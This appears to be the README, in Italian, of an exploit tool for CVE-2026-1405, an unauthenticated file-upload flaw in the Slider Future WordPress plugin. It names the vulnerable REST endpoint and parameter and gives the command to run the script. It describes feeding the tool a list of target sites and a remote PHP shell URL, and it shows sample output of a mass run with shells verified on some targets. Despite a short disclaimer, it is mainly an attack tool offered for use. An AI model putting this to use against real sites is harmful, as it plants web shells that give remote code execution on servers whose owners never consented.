
Slider Future <= 1.0.5 - Caricamento arbitrario di file non autenticato
Slider Future <= 1.0.5 - Caricamento Arbitrario di File Non Autenticato
Componente: Slider Future (plugin WordPress)
Versioni interessate: ≤ 1.0.5
Vulnerabilità: Caricamento Arbitrario di File Non Autenticato
CVE: CVE-2026-1405
Punteggio CVSS: 9.8 (Critico)
Il plugin Slider Future per WordPress è vulnerabile al caricamento arbitrario di file a causa della mancata validazione del tipo di file nella funzione slider_future_handle_image_upload in tutte le versioni fino alla 1.0.5 inclusa. Ciò consente ad attaccanti non autenticati di caricare qualsiasi tipo di file, inclusi shell PHP dannose, direttamente sul server interessato, consentendo l'esecuzione di codice remota.
/wp-json/slider-future/v1/upload-image/image_url (autenticazione non richiesta).http://example1.com
https://example2.com
...
Esempio: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Ti verrà richiesto di inserire:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url che punta alla tua shell.Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.
L'uso non autorizzato contro siti che non possiedi o per i quali non hai ricevuto esplicito permesso di test è illegale.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt